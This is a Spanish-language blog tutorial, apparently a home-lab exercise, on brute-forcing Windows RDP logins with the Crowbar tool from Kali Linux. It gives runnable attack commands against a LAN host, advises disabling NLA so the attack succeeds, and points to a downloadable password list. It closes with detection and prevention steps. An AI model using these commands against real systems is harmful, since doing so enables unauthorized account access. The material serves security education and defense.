---
title: Ataques RDP por fuerza bruta en una red local [borrador, en progreso]
subtitle: Kali Linux
date: 2022-03-16
draft: false
description: Kali Linux
tags: ["Seguridad Informática","LAN","RDP","Kali","SEIF"]
---

<!-- vscode-markdown-toc -->
* 1. [Ataque de fuerza bruta con Crowbar](#AtaquedefuerzabrutaconCrowbar)
	* 1.1. [Instalación de Crowbar y primeros pasos](#InstalacindeCrowbaryprimerospasos)
	* 1.2. [Habilitar RDP en la victima](#HabilitarRDPenlavictima)
	* 1.3. [Ataque en marcha](#Ataqueenmarcha)
* 2. [Detección](#Deteccin)
* 3. [Prevención](#Prevencin)
* 4. [Enlaces externos](#Enlacesexternos)

<!-- vscode-markdown-toc-config
	numbering=true
	autoSave=true
	/vscode-markdown-toc-config -->
<!-- /vscode-markdown-toc -->

El **Protocolo de Escritorio Remoto** ([Remote Desktop Protocol (RDP)](https://es.wikipedia.org/wiki/Remote_Desktop_Protocol))  es un protocolo propietario desarrollado por Microsoft que permite que el escritorio de un equipo informático sea controlado a distancia por un usuario remoto. El funcionamiento es sencillo, la información gráfica que genera el servidor es convertida a un formato propio RDP y enviada a través de la red al terminal, que interpretará la información contenida en el paquete del protocolo para reconstruir la imagen a mostrar en la pantalla del terminal. En cuanto a la introducción de órdenes en el terminal por parte del usuario, las teclas que pulse el usuario en el teclado del terminal así como los movimientos y pulsaciones de ratón son redirigidos al servidor. Este servicio **utiliza por defecto el puerto TCP 3389** en el servidor para recibir las peticiones. 

A lo largo de su historia la RDP ha presentado una serie de incidencias y vulnerabilidades, por eso mismos se suele recomendar no usar un servicio RDP de una LAN publicado en Internet para ofrecer servicios remotos a trabajadores o para el mantenimiento y gestión de los propios administradores de la red (o al menos debería ir [encapsulado con SSL/TLS](https://security.berkeley.edu/education-awareness/securing-remote-desktop-rdp-system-administrators)).

##  1. <a name='AtaquedefuerzabrutaconCrowbar'></a>Ataque de fuerza bruta con Crowbar

###  1.1. <a name='InstalacindeCrowbaryprimerospasos'></a>Instalación de Crowbar y primeros pasos

Se puede instalar con el gestor de paquetes de Linux, en distribuciones Debian / Ubuntu / Kali: `sudo apt install -y crowbar`.  Yo he escogido una forma alternativa clonando el repositorio original en GitHub con `git clone https://github.com/galkan/crowbar.git`. 

Una vez clonado usando Git accedo a la carpeta con `cd crowbar` y pruebo que funcione mostrando la ayuda con `python3 crowbar.py -h `:

```
──(kali㉿kali)-[~/crowbar]
└─$ python3 crowbar.py -h 
usage: Usage: use --help for further information

Crowbar is a brute force tool which supports OpenVPN, Remote Desktop Protocol, SSH Private Keys and VNC Keys.

positional arguments:
  options

optional arguments:
  -h, --help            show this help message and exit
  -b {openvpn,rdp,sshkey,vnckey}, --brute {openvpn,rdp,sshkey,vnckey}
                        Target service
  -s SERVER, --server SERVER
                        Static target
  -S SERVER_FILE, --serverfile SERVER_FILE
                        Multiple targets stored in a file
  -u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
                        Static name to login with
  -U USERNAME_FILE, --usernamefile USERNAME_FILE
                        Multiple names to login with, stored in a file
  -n THREAD, --number THREAD
                        Number of threads to be active at once
  -l FILE, --log FILE   Log file (only write attempts)
  -o FILE, --output FILE
                        Output file (write everything else)
  -c PASSWD, --passwd PASSWD
                        Static password to login with
  -C FILE, --passwdfile FILE
                        Multiple passwords to login with, stored in a file
  -t TIMEOUT, --timeout TIMEOUT
                        [SSH] How long to wait for each thread (seconds)
  -p PORT, --port PORT  Alter the port if the service is not using the default value
  -k KEY_FILE, --keyfile KEY_FILE
                        [SSH/VNC] (Private) Key file or folder containing multiple files
  -m CONFIG, --config CONFIG
                        [OpenVPN] Configuration file
  -d, --discover        Port scan before attacking open ports
  -v, --verbose         Enable verbose output (-vv for more)
  -D, --debug           Enable debug mode
  -q, --quiet           Only display successful logins
```

Fijate que la aplicación no es más que un programa desarrollado en Python, Kali ya tiene Python instalado por defecto por lo que no debemos hacer nada especial al respecto.

###  1.2. <a name='HabilitarRDPenlavictima'></a>Habilitar RDP en la victima

Todas las versiones Windows Profesional ofrecen la posibilidad de configurar un servidor local de escritorio remoto, sólo se debe habilitar, en Windows 10 dirígete al menú de inicio y pulsa sobre la rueda dentada del menú de Configuración, busca el menú de Escritorio remoto en la barra superior.

![](img/01.png)

![](img/02.png)

Desde una ventana DOS podemos comprobar ahora si el servidor RDP está "escuchando" en el puerto 3389 por defecto con `netstat -an |find "3389"`.

Desde la propia máquina local o desde Kali podemos usar Telnet para comprobar si el puerto 3389 está abierto, por ejemplo `telnet 192.168.1.134 3389` (la IP 192.168.1.134 corresponde al equipo que queremos atacar con Win 10 y RDP habilitado).

Kali también ofrece un cliente RDP por línea de comandos, [rdesktop](https://www.kali.org/tools/rdesktop/), comando de ejemplo `rdesktop -v 192.168.1.134:3389`.

Seguramente **para que este tipo de ataques tengan éxito debemos desactivar la opción NLA** (Network Level Authentication), este es un mecanismo que protege la comunicación en conexiones RDP. NLA apareció en Windows Vista y Windows Server 2008, precisamente para fortificar las conexiones RDP frente a los ataques de Redes IPv4/IPv6. NLA utiliza CredSSP (Credential Security Support Provider) para llevar a cabo el proceso de autenticación fuerte. Utiliza TLS/SSL o Kerberos. Está hecho para proteger específicamente contra ataques de MiTM.

![](img/05.png)

Yo para las pruebas he creado un usuario dentro del grupo de Administradores local de la máquina Win10 con usuario "Superuser" y contraseña "nk3abhxu62HKBgpP".

###  1.3. <a name='Ataqueenmarcha'></a>Ataque en marcha

Ahora realizo una prueba de Crowbar con un usuario concreto para comprobar que la aplicación funciona:

```
python3 crowbar.py -b rdp --server 192.168.1.134 -u usuario -c nk3abhxu62HKBgpP
```

![](img/06.png)

Ahora vamos a usar ficheros con nombres de usuarios y contraseñas para nuestro ataque por fuerza bruta.

```
python3 crowbar.py -v -b rdp --server 192.168.1.134/32 -u Administrador -C passwords.txt
```

Para la prueba yo me he descargado un archivo con contraseñas de [aquí](https://github.com/duyet/bruteforce-database), contiene contraseñas de 8 caracteres o más, lo he llamado passwords.txt. Uso la opción "-D" de crowbar para ver en detalle como va probando las contraseñas para el usuario "Administrador".

![](img/08.png)





##  2. <a name='Deteccin'></a>Detección

Examinar el log de eventos de Windows ( Applications and Services Logs -> Microsoft -> Windows -> Terminal-Services-RemoteConnectionManager > Operational).

![](img/07.png)

##  3. <a name='Prevencin'></a>Prevención 

Una forma es modificando los ajustes de las políticas locales, se puede acceder desde las herramientas administrativas de Windows o usando el siguiente comando Win+R `secpol.msc`.

![](img/03.png)

Navegamos a la opción "Directivas de cuenta" > "Directiva de bloqueo de cuenta" y modificamos el valor "Umbral de bloqueo de cuenta", por ejemplo establecemos un 3 en lugar del 0 por defecto:

![](img/04.png)

Otras opciones:

* Deshabilitar RDP.
* Usar una VPN.
* Usar autenticación MFA.

##  4. <a name='Enlacesexternos'></a>Enlaces externos

* [https://docs.microsoft.com/es-es/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol](https://docs.microsoft.com/es-es/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol).
* [https://nordvpn.com/es/blog/acceso-remoto-rdp/](https://nordvpn.com/es/blog/acceso-remoto-rdp/).

Sobre Crowbar:

* [https://github.com/galkan/crowbar](https://github.com/galkan/crowbar).
* [https://medium.com/@idan_malihi/remote-desktop-rdp-brute-force-attack-f5484d8cf6a3(https://medium.com/@idan_malihi/remote-desktop-rdp-brute-force-attack-f5484d8cf6a3)].
* [https://www.youtube.com/watch?v=4QZAWGsveSM](https://www.youtube.com/watch?v=4QZAWGsveSM)


Detección:

* [https://www.secplicity.org/2017/12/05/indicators-rdp-brute-force-attacks/](https://www.secplicity.org/2017/12/05/indicators-rdp-brute-force-attacks/).